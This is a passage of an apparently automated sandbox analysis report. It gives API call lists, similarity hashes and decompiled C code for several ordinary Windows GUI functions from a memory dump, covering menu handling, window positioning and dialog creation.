                  • GetSysColorBrush.USER32(00000006), ref: 00421563
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$Brush
                  • String ID:
                  • API String ID: 2798902688-0
                  • Opcode ID: 69474bcffed8dda3a6354f21933ebca6f7b00e446e8661710cf6f1e24790a001
                  • Instruction ID: 34d056c00bb6a588f6a373530df72d39a2723666dc88f26c28721c2631e374e8
                  • Opcode Fuzzy Hash: 69474bcffed8dda3a6354f21933ebca6f7b00e446e8661710cf6f1e24790a001
                  • Instruction Fuzzy Hash: 42F0FE719407485BD730BBB25D09B47BAD1EFC4710F02192AD2858B990D6B5E441DF44
                  Uniqueness

                  Uniqueness Score: 0.15%

                  APIs
                    • Part of subcall function 00424B98: PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00424BDA
                    • Part of subcall function 00424B98: SetRectEmpty.USER32(?), ref: 00424BFE
                    • Part of subcall function 00424B98: GetDesktopWindow.USER32 ref: 00424C16
                    • Part of subcall function 00424B98: LockWindowUpdate.USER32(?), ref: 00424C27
                    • Part of subcall function 0041408A: GetModuleHandleA.KERNEL32(GDI32.DLL,?,004252AE), ref: 00414094
                    • Part of subcall function 0041408A: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004140A0
                  • GetWindowRect.USER32(?,?), ref: 004252D4
                    • Part of subcall function 004140C2: GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 004140D0
                    • Part of subcall function 004140C2: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004140DE
                  • InflateRect.USER32(?,00000002,00000002), ref: 004253C6
                  • InflateRect.USER32(?,00000002,00000002), ref: 0042556C
                    • Part of subcall function 004249F1: OffsetRect.USER32(?,?,?), ref: 00424A2A
                    • Part of subcall function 00425168: GetCapture.USER32 ref: 0042517B
                    • Part of subcall function 00425168: SetCapture.USER32(?), ref: 0042518B
                    • Part of subcall function 00425168: GetCapture.USER32 ref: 00425197
                    • Part of subcall function 00425168: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004251B1
                    • Part of subcall function 00425168: DispatchMessageW.USER32(?), ref: 004251E3
                    • Part of subcall function 00425168: GetCapture.USER32 ref: 00425241
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockOffsetPeekUpdate
                  • String ID:
                  • API String ID: 221289759-0
                  • Opcode ID: 48efcf45122435e95ef7b522c55cab944265335b5d8108171b7e8e58d6bd7be7
                  • Instruction ID: 78804f7dd54d9a8f104266528498f0cd52c217b7c0a0adf1ce6f4a2b447368da
                  • Opcode Fuzzy Hash: 48efcf45122435e95ef7b522c55cab944265335b5d8108171b7e8e58d6bd7be7
                  • Instruction Fuzzy Hash: 04B15932A00619AFCF01DFA4C880EEE7BBAFF49314F054565FD05AF265D672A984CB90
                  Uniqueness

                  Uniqueness Score: 23.02%

                  C-Code - Quality: 89%
                  			E004169E8(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                  				intOrPtr* _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				signed int _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				int _v44;
                  				char _v48;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t53;
                  				intOrPtr* _t54;
                  				struct HMENU__* _t58;
                  				int _t59;
                  				int _t60;
                  				struct HMENU__* _t61;
                  				int _t63;
                  				void* _t65;
                  				signed int _t67;
                  				int _t68;
                  				struct HMENU__* _t69;
                  				struct HMENU__* _t70;
                  				int _t71;
                  				intOrPtr* _t75;
                  				int _t78;
                  				struct HMENU__* _t86;
                  				intOrPtr _t90;
                  				intOrPtr* _t92;
                  				int _t93;
                  				struct HMENU__* _t94;
                  
                  				_t79 = __ecx;
                  				_t92 = __ecx;
                  				_v8 = __ecx;
                  				_t53 = E00420B28( *((intOrPtr*)(__ecx + 0x20)));
                  				if(_a12 == 0) {
                  					_t54 = __ecx + 0x80;
                  					_t90 = _a4;
                  					if( *_t54 == 0) {
                  						L3:
                  						_t98 = _t90;
                  						if(_t90 == 0) {
                  							E00413DD0(_t79);
                  						}
                  						E0041187F( &_v48);
                  						_v36 = _t90;
                  						if( *((intOrPtr*)(E00420285(0, _t90, _t92, _t98) + 0x78)) !=  *(_t90 + 4)) {
                  							__eflags =  *((intOrPtr*)(_t92 + 0xd4)) - 1;
                  							if( *((intOrPtr*)(_t92 + 0xd4)) != 1) {
                  								_t58 =  *(_t92 + 0xd8);
                  							} else {
                  								_t58 = GetMenu( *(_t92 + 0x20));
                  							}
                  							__eflags = _t58;
                  							if(_t58 == 0) {
                  								goto L20;
                  							} else {
                  								_t69 = E0040F8F7(_t92, _t90);
                  								__eflags = _t69;
                  								if(_t69 == 0) {
                  									goto L20;
                  								}
                  								_t86 = _t69;
                  								_t70 =  *((intOrPtr*)(_t69->i + 0x6c))();
                  								__eflags = _t70;
                  								if(_t70 == 0) {
                  									goto L20;
                  								}
                  								_t94 =  *(_t70 + 4);
                  								__eflags = _t94;
                  								if(_t94 == 0) {
                  									L19:
                  									_t92 = _v8;
                  									goto L20;
                  								}
                  								_t71 = GetMenuItemCount(_t94);
                  								_t78 = 0;
                  								_a12 = _t71;
                  								__eflags = _t71;
                  								if(_t71 <= 0) {
                  									goto L19;
                  								} else {
                  									goto L15;
                  								}
                  								while(1) {
                  									L15:
                  									__eflags = GetSubMenu(_t94, _t78) -  *(_t90 + 4);
                  									if(__eflags == 0) {
                  										break;
                  									}
                  									_t78 = _t78 + 1;
                  									__eflags = _t78 - _a12;
                  									if(_t78 < _a12) {
                  										continue;
                  									}
                  									goto L19;
                  								}
                  								_v12 = E0041F7CC(_t78, _t86, _t90, _t94, __eflags, _t94);
                  								goto L19;
                  							}
                  						} else {
                  							_v12 = _t90;
                  							L20:
                  							_t59 = GetMenuItemCount( *(_t90 + 4));
                  							_v40 = _v40 & 0x00000000;
                  							_v16 = _t59;
                  							if(_t59 <= 0) {
                  								L39:
                  								return _t59;
                  							} else {
                  								goto L21;
                  							}
                  							do {
                  								L21:
                  								_t60 = E0040CC72(_t90, _v40);
                  								_v44 = _t60;
                  								if(_t60 == 0) {
                  									goto L38;
                  								}
                  								if(_t60 != 0xffffffff) {
                  									_v32 = _v32 & 0x00000000;
                  									__eflags =  *(_t92 + 0x54);
                  									if( *(_t92 + 0x54) == 0) {
                  										L30:
                  										_t61 = 0;
                  										__eflags = 0;
                  										L31:
                  										_push(_t61);
                  										L32:
                  										_push(_t92);
                  										E004118A5( &_v48);
                  										_t63 = GetMenuItemCount( *(_t90 + 4));
                  										_t93 = _t63;
                  										if(_t93 >= _v16) {
                  											L37:
                  											_v16 = _t93;
                  											_t92 = _v8;
                  											goto L38;
                  										}
                  										_v40 = _v40 + _t63 - _v16;
                  										while(_v40 < _t93) {
                  											_t65 = E0040CC72(_t90, _v40);
                  											__eflags = _t65 - _v44;
                  											if(_t65 != _v44) {
                  												goto L37;
                  											}
                  											_t44 =  &_v40;
                  											 *_t44 = _v40 + 1;
                  											__eflags =  *_t44;
                  										}
                  										goto L37;
                  									}
                  									__eflags = _t60 - 0xf000;
                  									if(_t60 >= 0xf000) {
                  										goto L30;
                  									}
                  									_t61 = 1;
                  									goto L31;
                  								}
                  								_t67 = E0040CC87(_t90, _v40);
                  								_v32 = _t67;
                  								if(_t67 == 0) {
                  									goto L38;
                  								}
                  								_t68 = GetMenuItemID( *(_t67 + 4), 0);
                  								_v44 = _t68;
                  								if(_t68 != 0 && _t68 != 0xffffffff) {
                  									_push(0);
                  									goto L32;
                  								}
                  								L38:
                  								_v40 = _v40 + 1;
                  								_t59 = _v40;
                  							} while (_t59 < _v16);
                  							goto L39;
                  						}
                  					}
                  					_t75 =  *_t54;
                  					_t79 = _t75;
                  					_t59 =  *((intOrPtr*)( *_t75 + 0x74))(_t90, _a8, 0);
                  					if(_t59 != 0) {
                  						goto L39;
                  					}
                  					goto L3;
                  				}
                  				return _t53;
                  			}




































                  APIs
                    • Part of subcall function 00420B28: GetFocus.USER32 ref: 00420B2E
                    • Part of subcall function 00420B28: GetParent.USER32(00000000), ref: 00420B56
                    • Part of subcall function 00420B28: GetWindowLongW.USER32(?,000000F0), ref: 00420B71
                    • Part of subcall function 00420B28: GetParent.USER32(?), ref: 00420B7F
                    • Part of subcall function 00420B28: GetDesktopWindow.USER32 ref: 00420B83
                    • Part of subcall function 00420B28: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 00420B97
                  • GetMenu.USER32(?), ref: 00416A60
                  • GetMenuItemCount.USER32(?), ref: 00416A90
                  • GetSubMenu.USER32(?,00000000), ref: 00416AA1
                  • GetMenuItemCount.USER32(?), ref: 00416AC9
                  • GetMenuItemID.USER32(?,00000000), ref: 00416B0A
                  • GetMenuItemCount.USER32(?), ref: 00416B45
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                  • String ID:
                  • API String ID: 4186786570-0
                  • Opcode ID: 93617185f288707b900541143e88cd098a3d75beb5be7de617f81e90bfbe9752
                  • Instruction ID: 74bea372a50bb56c68ea711328b55824e7ee12be864e95f7961d03fddb174585
                  • Opcode Fuzzy Hash: 93617185f288707b900541143e88cd098a3d75beb5be7de617f81e90bfbe9752
                  • Instruction Fuzzy Hash: 01518A31A00215DFCB21AFA4C984AEEB7B5FF45354F22856BE411F2250D738EE84CB69
                  Uniqueness

                  Uniqueness Score: 3.53%

                  C-Code - Quality: 92%
                  			E00424E62(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				struct tagRECT _v28;
                  				struct tagRECT _v44;
                  				struct tagRECT _v60;
                  				void* _t81;
                  				int _t83;
                  				int _t90;
                  				intOrPtr _t92;
                  				intOrPtr _t111;
                  				int _t125;
                  				void* _t134;
                  				void* _t139;
                  				intOrPtr _t143;
                  				void* _t145;
                  				void* _t149;
                  
                  				_t145 = __edi;
                  				_t134 = __ecx;
                  				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
                  				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
                  				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
                  				_t149 = 2;
                  				if(_t143 == 0xa) {
                  					L7:
                  					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
                  					L9:
                  					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
                  					__eflags = _t83;
                  					L10:
                  					if(_t83 < 0) {
                  						_t83 = 0;
                  					}
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x140))( &_v12, _t83, _t149, _t145);
                  					_v44.left = GetSystemMetrics(0x4c);
                  					_v44.top = GetSystemMetrics(0x4d);
                  					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
                  					_t90 = GetSystemMetrics(0x4f);
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_v44.bottom = _t90 + _v44.top;
                  					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
                  					asm("movsd");
                  					if(_t92 == 0xa || _t92 == 0xc) {
                  						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
                  						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
                  						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                  						if(__eflags != 0) {
                  							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
                  							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
                  							__eflags = _t111;
                  							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
                  							 *(_t134 + 0x48) = _v28.left;
                  							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
                  						}
                  					} else {
                  						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
                  						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
                  						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
                  						_t162 = _t125;
                  						if(_t125 != 0) {
                  							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
                  							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
                  							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
                  							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
                  						}
                  					}
                  					 *((intOrPtr*)(_t134 + 4)) = _a4;
                  					 *((intOrPtr*)(_t134 + 8)) = _a8;
                  					return E00424C4D(_t134, _t162, 0);
                  				}
                  				if(_t143 == 0xb) {
                  					__eflags = _t143 - 0xa;
                  					if(_t143 != 0xa) {
                  						_t14 = __ecx + 0x30;
                  						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
                  						__eflags =  *_t14;
                  						goto L9;
                  					}
                  					goto L7;
                  				} else {
                  					_t149 = 0x22;
                  					if(_t143 != 0xc) {
                  						_t8 = __ecx + 0x34;
                  						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
                  						__eflags =  *_t8;
                  					} else {
                  						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
                  					}
                  					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
                  					goto L10;
                  				}
                  			}




















                  APIs
                  • GetSystemMetrics.USER32(0000004C), ref: 00424EDC
                  • GetSystemMetrics.USER32(0000004D), ref: 00424EE3
                  • GetSystemMetrics.USER32(0000004E), ref: 00424EEA
                  • GetSystemMetrics.USER32(0000004F), ref: 00424EF4
                  • IntersectRect.USER32(?,?,?), ref: 00424F41
                  • IntersectRect.USER32(?,?,?), ref: 00424F95
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$IntersectRect
                  • String ID:
                  • API String ID: 1124862357-0
                  • Opcode ID: d235708a7cc9a760f0fa2ff56dd837bd0a4c05237304a79e2b5da368e2937389
                  • Instruction ID: 715b25b0f11072c126adf57b0713e80f32b7b9fb693b38b32de5c86764fc73a0
                  • Opcode Fuzzy Hash: d235708a7cc9a760f0fa2ff56dd837bd0a4c05237304a79e2b5da368e2937389
                  • Instruction Fuzzy Hash: 7F519272A002199FCB54DFACD5C5A9EBBF4FF48310F1441A6E909EB24AE634E940CB94
                  Uniqueness

                  Uniqueness Score: 2.71%

                  C-Code - Quality: 81%
                  			E004131FC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				long _t67;
                  				long _t70;
                  				long _t77;
                  				intOrPtr* _t89;
                  				intOrPtr* _t91;
                  				void* _t92;
                  				intOrPtr* _t93;
                  				intOrPtr* _t97;
                  				void* _t105;
                  				void* _t109;
                  				intOrPtr _t111;
                  				void* _t126;
                  				intOrPtr* _t127;
                  				void* _t131;
                  
                  				_push(0x10);
                  				E0042922B(E00438C61, __ebx, __edi, __esi);
                  				_t126 = __ecx;
                  				_t100 = 0;
                  				_t130 = 1;
                  				 *(_t131 - 0x1c) = 0;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
                  					if(__eflags == 0) {
                  						L19:
                  						_push( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x74)) + 0x1c)));
                  						E00410F00(_t100,  *((intOrPtr*)(_t131 + 8)), _t126, _t130, __eflags);
                  						L20:
                  						return E00429303( *((intOrPtr*)(_t131 + 8)));
                  					}
                  					__eflags =  *(__ecx + 0x20);
                  					if(__eflags == 0) {
                  						goto L19;
                  					}
                  					E00404820(_t131 - 0x10);
                  					 *(_t131 - 4) = 1;
                  					_t130 = 0x104;
                  					_t67 = E00405860(_t131 - 0x10, __eflags, 0x104);
                  					_t100 = GetParent;
                  					 *(_t131 - 0x1c) = _t67;
                  					_t70 = SendMessageW( *(E0040E20E(GetParent, _t131 - 0x10, GetParent( *(_t126 + 0x20))) + 0x20), 0x464, 0x104,  *(_t131 - 0x1c));
                  					_t105 = _t131 - 0x10;
                  					__eflags = _t70;
                  					if(__eflags >= 0) {
                  						E0040E100(GetParent, _t105, _t126, 0xffffffff);
                  					} else {
                  						E004057B0(GetParent, _t105, _t126, 0x104, __eflags);
                  					}
                  					__eflags =  *( *((intOrPtr*)(_t131 - 0x10)) - 0xc);
                  					if(__eflags == 0) {
                  						L18:
                  						 *(_t131 - 4) =  *(_t131 - 4) | 0xffffffff;
                  						__eflags =  *((intOrPtr*)(_t131 - 0x10)) + 0xfffffff0;
                  						E004055F0( *((intOrPtr*)(_t131 - 0x10)) + 0xfffffff0);
                  						goto L19;
                  					} else {
                  						 *(_t131 - 0x1c) = E00405860(_t131 - 0x10, __eflags, _t130);
                  						_t77 = SendMessageW( *(E0040E20E(_t100, _t131 - 0x10, GetParent( *(_t126 + 0x20))) + 0x20), 0x465, _t130,  *(_t131 - 0x1c));
                  						_t109 = _t131 - 0x10;
                  						__eflags = _t77;
                  						if(__eflags >= 0) {
                  							E0040E100(_t100, _t109, _t126, 0xffffffff);
                  							E00405590( *((intOrPtr*)(_t131 + 8)), __eflags, _t131 - 0x10);
                  							_t111 =  *((intOrPtr*)(_t131 - 0x10));
                  							L9:
                  							E004055F0(_t111 + 0xfffffff0);
                  							goto L20;
                  						}
                  						E004057B0(_t100, _t109, _t126, _t130, __eflags);
                  						goto L18;
                  					}
                  				}
                  				if( *(__ecx + 0x20) == 0) {
                  					goto L19;
                  				}
                  				E00404820(_t131 - 0x14);
                  				_t127 =  *((intOrPtr*)(_t126 + 0x80));
                  				_push(_t131 - 0x10);
                  				_push(_t127);
                  				 *(_t131 - 4) = 0;
                  				if( *((intOrPtr*)( *_t127 + 0x38))() < 0) {
                  					L8:
                  					E00405590( *((intOrPtr*)(_t131 + 8)), _t138, _t131 - 0x14);
                  					_t111 =  *((intOrPtr*)(_t131 - 0x14));
                  					goto L9;
                  				}
                  				_t89 =  *((intOrPtr*)(_t131 - 0x10));
                  				_push(_t131 - 0x1c);
                  				_push(0x400000);
                  				_push(_t89);
                  				if( *((intOrPtr*)( *_t89 + 0x18))() != 1) {
                  					L5:
                  					_t91 =  *((intOrPtr*)(_t131 - 0x10));
                  					 *((intOrPtr*)(_t131 - 0x18)) = _t100;
                  					_t92 =  *((intOrPtr*)( *_t91 + 0x14))(_t91, 0x80058000, _t131 - 0x18);
                  					_t138 = _t92;
                  					if(_t92 >= 0) {
                  						E00405C40(_t131 - 0x14,  *((intOrPtr*)(_t131 - 0x18)));
                  						E0040E100(_t100, _t131 - 0x14, _t127, 0xffffffff);
                  						__imp__CoTaskMemFree( *((intOrPtr*)(_t131 - 0x18)));
                  					}
                  					L7:
                  					_t93 =  *((intOrPtr*)(_t131 - 0x10));
                  					 *((intOrPtr*)( *_t93 + 8))(_t93);
                  					goto L8;
                  				}
                  				_t97 =  *((intOrPtr*)(_t131 - 0x10));
                  				_push(_t131 - 0x1c);
                  				_push(0x20000000);
                  				_push(_t97);
                  				if( *((intOrPtr*)( *_t97 + 0x18))() == 0) {
                  					goto L7;
                  				}
                  				goto L5;
                  			}


















                  APIs
                  • __EH_prolog3.LIBCMT ref: 00413203
                  • CoTaskMemFree.OLE32(?), ref: 004132A0
                  • GetParent.USER32(?), ref: 00413309
                  • SendMessageW.USER32(?,00000464,00000104,?), ref: 0041331D
                  • GetParent.USER32(?), ref: 00413350
                  • SendMessageW.USER32(?,00000465,00000104,?), ref: 00413364
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageParentSend$FreeH_prolog3Task
                  • String ID:
                  • API String ID: 526180827-0
                  • Opcode ID: e566723c80c9fb766318665a4cacdf553949550406e157b430afc983f0a72caf
                  • Instruction ID: 539b08ce067ba1eea6e1235fbcdf03628de7fdf567ee8bddfa80aac1f8c995a6
                  • Opcode Fuzzy Hash: e566723c80c9fb766318665a4cacdf553949550406e157b430afc983f0a72caf
                  • Instruction Fuzzy Hash: 0D514C7090011AEBCB04EFA1CC89EAFB775FF44319B10496EB521A72E1DB389951CB98
                  Uniqueness

                  Uniqueness Score: 1.59%

                  C-Code - Quality: 91%
                  			E0041EA88(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t61;
                  				signed int _t66;
                  				signed int _t69;
                  				struct HWND__* _t70;
                  				signed int _t73;
                  				signed int _t103;
                  				void* _t114;
                  				signed int _t117;
                  				DLGTEMPLATE* _t118;
                  				struct HWND__* _t119;
                  				intOrPtr* _t121;
                  				void* _t122;
                  
                  				_t116 = __edi;
                  				_t114 = __edx;
                  				_t97 = __ecx;
                  				_push(0x3c);
                  				E0042925E(E0043936D, __ebx, __edi, __esi);
                  				_t121 = __ecx;
                  				 *((intOrPtr*)(_t122 - 0x20)) = __ecx;
                  				_t126 =  *(_t122 + 0x10);
                  				if( *(_t122 + 0x10) == 0) {
                  					 *(_t122 + 0x10) =  *(E0042083D(0, __edi, __ecx, _t126) + 0xc);
                  				}
                  				_t117 =  *(E0042083D(0, _t116, _t121, _t126) + 0x3c);
                  				 *(_t122 - 0x28) = _t117;
                  				 *(_t122 - 0x14) = 0;
                  				 *(_t122 - 4) = 0;
                  				E00411247(0, _t97, _t117, _t121, _t126, 0x10);
                  				E00411247(0, _t97, _t117, _t121, _t126, 0xfc000);
                  				E0040E959(0, _t97, _t114, _t117, _t126);
                  				if(_t117 == 0) {
                  					_t118 =  *(_t122 + 8);
                  					L7:
                  					__eflags = _t118;
                  					if(__eflags == 0) {
                  						L4:
                  						_t61 = 0;
                  						L26:
                  						return E00429303(_t61);
                  					}
                  					E00404820(_t122 - 0x1c);
                  					 *(_t122 - 4) = 1;
                  					 *((intOrPtr*)(_t122 - 0x18)) = 0;
                  					_t66 = E00426106(__eflags, _t118, _t122 - 0x1c, _t122 - 0x18);
                  					__eflags = _t66;
                  					__eflags = 0 | _t66 == 0x00000000;
                  					if(__eflags != 0) {
                  						_push(_t118);
                  						E004260CA(0, _t122 - 0x38);
                  						 *(_t122 - 4) = 2;
                  						E00426026(_t122 - 0x38,  *((intOrPtr*)(_t122 - 0x18)));
                  						 *(_t122 - 0x14) = E00425D62(_t122 - 0x38);
                  						 *(_t122 - 4) = 1;
                  						E00425D54(_t122 - 0x38);
                  						__eflags =  *(_t122 - 0x14);
                  						if(__eflags != 0) {
                  							_t118 = GlobalLock( *(_t122 - 0x14));
                  						}
                  					}
                  					 *(_t121 + 0x44) =  *(_t121 + 0x44) | 0xffffffff;
                  					 *(_t121 + 0x3c) =  *(_t121 + 0x3c) | 0x00000010;
                  					E00410178(0, __eflags, _t121);
                  					_t69 =  *(_t122 + 0xc);
                  					__eflags = _t69;
                  					if(_t69 != 0) {
                  						_t70 =  *(_t69 + 0x20);
                  					} else {
                  						_t70 = 0;
                  					}
                  					_t119 = CreateDialogIndirectParamW( *(_t122 + 0x10), _t118, _t70, E0041E4C6, 0);
                  					E004055F0( *((intOrPtr*)(_t122 - 0x1c)) + 0xfffffff0);
                  					 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
                  					_t103 =  *(_t122 - 0x28);
                  					__eflags = _t103;
                  					if(__eflags != 0) {
                  						__eflags = _t119;
                  						if(__eflags != 0) {
                  							 *((intOrPtr*)( *_t103 + 0x18))(_t122 - 0x48);
                  							 *((intOrPtr*)( *_t121 + 0x134))(0);
                  						}
                  					}
                  					_t73 = E0040E2C7(0, _t119, __eflags);
                  					__eflags = _t73;
                  					if(_t73 == 0) {
                  						 *((intOrPtr*)( *_t121 + 0x11c))();
                  					}
                  					__eflags = _t119;
                  					if(_t119 != 0) {
                  						__eflags =  *(_t121 + 0x3c) & 0x00000010;
                  						if(( *(_t121 + 0x3c) & 0x00000010) == 0) {
                  							DestroyWindow(_t119);
                  							_t119 = 0;
                  							__eflags = 0;
                  						}
                  					}
                  					__eflags =  *(_t122 - 0x14);
                  					if( *(_t122 - 0x14) != 0) {
                  						GlobalUnlock( *(_t122 - 0x14));
                  						GlobalFree( *(_t122 - 0x14));
                  					}
                  					__eflags = _t119;
                  					_t54 = _t119 != 0;
                  					__eflags = _t54;
                  					_t61 = 0 | _t54;
                  					goto L26;
                  				}
                  				_push(_t122 - 0x48);
                  				if( *((intOrPtr*)( *_t121 + 0x134))() != 0) {
                  					_t118 =  *((intOrPtr*)( *_t117 + 0x14))(_t122 - 0x48,  *(_t122 + 8));
                  					goto L7;
                  				}
                  				goto L4;
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041EA8F
                  • GlobalLock.KERNEL32(?,?,?), ref: 0041EB6C
                  • CreateDialogIndirectParamW.USER32(?,?,?,0041E4C6,00000000), ref: 0041EB9B
                  • DestroyWindow.USER32(00000000), ref: 0041EC15
                  • GlobalUnlock.KERNEL32(?), ref: 0041EC25
                  • GlobalFree.KERNEL32(?), ref: 0041EC2E
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                  • String ID:
                  • API String ID: 3003189058-0
                  • Opcode ID: b3c3285bc0f4863b7936d6c0e857eb5e25feb146a34a2935965097fc7181b108
                  • Instruction ID: 924653365d4f3961b2981b15b1c43f285f32c02dddf50d8ec133333372edc051
                  • Opcode Fuzzy Hash: b3c3285bc0f4863b7936d6c0e857eb5e25feb146a34a2935965097fc7181b108
                  • Instruction Fuzzy Hash: F351F775A00209DFCF10EFA5C8859EEBBB1BF44304F54456EF912A7291DB38AD81CB59
                  Uniqueness

                  Uniqueness Score: 0.71%

                  C-Code - Quality: 97%
                  			E00416B89(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __ebp;
                  				signed int* _t45;
                  				int _t46;
                  				void* _t53;
                  				signed int _t62;
                  				intOrPtr* _t65;
                  				intOrPtr _t66;
